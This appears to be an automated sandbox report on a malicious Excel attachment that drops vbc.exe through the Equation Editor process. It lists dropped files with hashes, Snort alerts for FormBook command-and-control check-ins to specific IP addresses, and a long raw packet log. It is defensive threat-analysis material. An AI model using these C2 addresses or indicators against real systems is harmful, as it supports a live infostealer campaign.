                                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):68702
                                                    Entropy (8bit):7.960564589117156
                                                    Encrypted:false
                                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29DF0F06.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):498420
                                                    Entropy (8bit):0.641342870106216
                                                    Encrypted:false
                                                    SSDEEP:384:4nXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:WXwBkNWZ3cjvmWa+VDO
                                                    MD5:EA7DE15A61A687151A4B7E9DD401753A
                                                    SHA1:701B40B67B793F214E4231EB705D0DC83FD089A5
                                                    SHA-256:C05DA95D7E8148582322F3AA161B26FD43EC89A1ED2AD32830DA37FCAD3F70D4
                                                    SHA-512:7B7A52464E67FFBA118D89E99C998FF1C510B591F20A34EBB09BA91E882E57CF855E5D8006C5E27DAB31E08E0D3A330852CA37B829581155A60063C83D44B86A
                                                    Malicious:false
                                                    Reputation:low
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3505F490.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):83904
                                                    Entropy (8bit):7.986000888791215
                                                    Encrypted:false
                                                    SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                                    MD5:9F9A7311810407794A153B7C74AED720
                                                    SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                                    SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                                    SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C66BA87.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                    Category:dropped
                                                    Size (bytes):85020
                                                    Entropy (8bit):7.2472785111025875
                                                    Encrypted:false
                                                    SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                    MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                    SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                    SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                    SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77E6274F.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):498420
                                                    Entropy (8bit):0.6413589843105386
                                                    Encrypted:false
                                                    SSDEEP:384:/LoXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:GXwBkNWZ3cjvmWa+VDO
                                                    MD5:B8AAC3B92367FB8C6A752850628E3348
                                                    SHA1:00D73FD238D33D014E29766FA00559A1F7252012
                                                    SHA-256:4CF94780BEB56C978738EFFDCF5CC78C5309A09CA03F970BA72E60207051EC0E
                                                    SHA-512:2E1DA188A704B6FC39205F5A659764CA6A533F5A0FE516692578382C766BD9F31E5C1C351A52BD289765287B9E791318B670A9C963684D50E9CDEF99AB6C32CA
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F71BD35.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):10202
                                                    Entropy (8bit):7.870143202588524
                                                    Encrypted:false
                                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\946B991E.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):68702
                                                    Entropy (8bit):7.960564589117156
                                                    Encrypted:false
                                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1107904.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):83904
                                                    Entropy (8bit):7.986000888791215
                                                    Encrypted:false
                                                    SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                                    MD5:9F9A7311810407794A153B7C74AED720
                                                    SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                                    SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                                    SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8C65A0B.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                    Category:dropped
                                                    Size (bytes):85020
                                                    Entropy (8bit):7.2472785111025875
                                                    Encrypted:false
                                                    SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                    MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                    SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                    SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                    SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                    Malicious:false
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2CECB51.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):10202
                                                    Entropy (8bit):7.870143202588524
                                                    Encrypted:false
                                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                    Malicious:false
                                                    C:\Users\user\Desktop\~$OCT 13 2021 - PRINT COPY.xlsx
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):165
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                    Malicious:true
                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    C:\Users\Public\vbc.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):474112
                                                    Entropy (8bit):7.47098319943845
                                                    Encrypted:false
                                                    SSDEEP:6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
                                                    MD5:6429AA83E4BC083B4F0B3F44B0D7950F
                                                    SHA1:0EAD59881F054284F611ACCB61451ED1FFC818FC
                                                    SHA-256:96C57AE661562E958E01BB0B490C09A0A51BB367931620223174963DE88BDFCB
                                                    SHA-512:186383701C591DB2C011C8AE24920759C10880068DD217E32110AE54B9C7F0863B7FB04E893F601A234742DEB5838A22820DC8835BA9198D66B7BB297D502F9B
                                                    Malicious:true

                                                    Static File Info

                                                    General

                                                    File type:CDFV2 Encrypted
                                                    Entropy (8bit):7.971800751750221
                                                    TrID:
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                    File name:OCT 13 2021 - PRINT COPY.xlsx
                                                    File size:356184
                                                    MD5:5c546d999e38e6e51a6c1675b3a646f3
                                                    SHA1:39ce280bc35b7cc313cbaed2476ee300d7e928c3
                                                    SHA256:980e889b97c92e9a81ff548a481978ad5c2b42829ddb6014d3720c19772e3799
                                                    SHA512:b39324fbc8cab5820566be872396b35a3aaaa44407b46632a46b255345dbed675f04c4f17ff9beb7ae046583b01498cb11b8115f8acbd92836825dff4385f7b4
                                                    SSDEEP:6144:Fr9OhqdApoBlNfbc6LWgAKCSQJePpqu5janAIxTCIEPtUr2TsBPDVvhi8mrO:/2WlNZWrSDBqUjanjPEP+RrVk8t

                                                    File Icon

                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                    10/13/21-20:17:25.557761  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49169      34.102.136.180  192.168.2.22
                                                    10/13/21-20:17:30.602564  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
                                                    10/13/21-20:17:30.602564  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
                                                    10/13/21-20:17:30.602564  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
                                                    10/13/21-20:17:30.718043  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49170      34.102.136.180  192.168.2.22
                                                    10/13/21-20:17:35.773064  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    172.67.213.229
                                                    10/13/21-20:17:35.773064  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    172.67.213.229
                                                    10/13/21-20:17:35.773064  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49171        80         192.168.2.22    172.67.213.229

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                    Oct 13, 2021 20:15:52.915903091 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.915920973 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.915929079 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.915946007 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.915955067 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.915970087 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.915978909 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.915997982 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916006088 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916023016 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916033983 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916045904 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916048050 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916070938 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916079998 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916095018 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916105986 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916117907 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916126966 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916141987 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916151047 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916167021 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916177988 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916194916 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916201115 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916222095 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916259050 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916269064 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.916280985 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.916295052 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.917301893 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.931936979 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.931982040 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932002068 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932024956 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932050943 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932071924 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932095051 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932110071 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.932118893 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.932143927 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.932148933 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.932152987 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933182955 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933217049 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933237076 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933258057 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933281898 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933284998 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933307886 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933310032 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933316946 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933336020 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933343887 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933361053 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.933370113 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.933393955 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.936377048 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.936650991 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.936758995 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.936806917 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.936834097 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.936849117 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937096119 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937155008 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937412977 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937469959 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937504053 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937547922 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937731981 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937753916 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937778950 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937782049 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937789917 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937809944 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937813997 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937834024 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937855959 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937860012 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937876940 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937886953 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937895060 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937911987 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937927008 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937937021 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937943935 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937961102 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937972069 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.937989950 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.937994957 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938016891 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938030005 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938044071 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938060045 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938071012 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938079119 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938097000 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938108921 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938122034 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938131094 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938146114 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938159943 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938169956 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938193083 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938199043 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938210011 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938224077 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938229084 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938249111 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938268900 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938273907 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938285112 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938297987 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938308954 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938323021 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938333035 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938349009 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938354969 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938374043 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.938389063 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.938407898 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.939147949 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950683117 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950721025 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950733900 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950754881 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950777054 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950798988 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950820923 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950841904 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950867891 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950890064 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950896025 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950920105 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950921059 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950925112 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950928926 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950932980 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950942993 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950959921 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950968027 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.950975895 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.950989962 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951001883 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.951014042 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951018095 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.951039076 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951047897 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.951071978 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.951870918 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951905966 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951927900 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951950073 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951972008 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.951992989 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952019930 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952028036 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952044964 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952054024 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952058077 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952069998 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952078104 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952094078 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952104092 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952119112 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952133894 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952143908 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952152014 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952167034 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952177048 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952191114 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952200890 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952218056 CEST804916518.197.254.181192.168.2.22
                                                    Oct 13, 2021 20:15:52.952225924 CEST4916580192.168.2.2218.197.254.181
                                                    Oct 13, 2021 20:15:52.952241898 CEST804916518.197.254.181192.168.2.22
